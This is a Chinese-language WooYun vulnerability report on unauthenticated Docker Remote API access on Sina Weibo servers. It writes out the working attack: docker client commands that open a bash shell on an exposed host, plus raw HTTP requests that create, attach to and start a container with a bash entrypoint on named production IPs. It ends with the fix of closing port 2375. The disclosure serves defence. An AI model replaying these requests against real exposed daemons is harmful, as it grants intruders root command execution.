当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209856

漏洞标题:新浪微博docker remote API未授权访问导致远程命令执行(root)

相关厂商:新浪微博

漏洞作者: lijiejie

提交时间:2016-05-17 20:55

修复时间:2016-05-17 21:07

公开时间:2016-05-17 21:07

漏洞类型:网络未授权访问

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新浪微博两个IP docker remote API未授权访问导致远程命令执行,root权限。 因为docker版本太低,临时用burp发出几个http请求调用api,实现了远程命令执行。本篇还介绍了直接获取交互式shell的方法。

详细说明:

http://123.125.105.158:2375/version
http://123.125.105.159:2375/version


"ApiVersion":"1.17",因为版本太低,我的docker client无法使用。我用burp来发包,实现远程执行系统命令,有一点小技巧。

weibo.apiversion.png

漏洞证明:

安装docker client: 

https://www.docker.com/products/docker-toolbox


以百度的那个IP为例,要获取交互式shell,首先获取images:

docker -H tcp://180.76.161.55:2375 images


docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"


这里我设置了entrypoint为/bin/bash。shell到手了,如下图:

baidu_shell.png


好了,继续看微博的机器,因为api的版本太低了,client无法直接使用。
一开始我执行命令的时候发现总不成功,查看container的时候才发现原来默认的Entrypoint是/usr/local/sinasrv2/sbin/nginx。不过创建容器的时候可以overwrite,创建一个容器:

POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip
{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}


找到Id,如图:

weibo_create_container.png


然后可以获取container的信息检查一下是否有问题,这一步可以略过:

http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json


接下来有两个http request,顺序非常重要,一定是要先attach,再start,这样就可以捕获到输出:

POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


如图,我在微博的container中执行命令,可以知道当前用户root,hostname是bcd44e3731cc,pwd是app。

weibo.rce.out.png


修复方案:

2375端口不要对外

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-17 21:07

厂商回复:

漏洞提交前已修复,故忽略。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-17 21:14 | 黑客,绝对是黑客 ( 路人 | Rank:18 漏洞数:4 | 黑客,绝对是黑客)

    翻了翻,其实这个在我ip列表里,然而我眼花没有看到~

  2. 2016-05-17 21:19 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2502 漏洞数:323 | Just for fun.)

    @黑客,绝对是黑客 赞啊,也要感谢你到wooyun分享漏洞!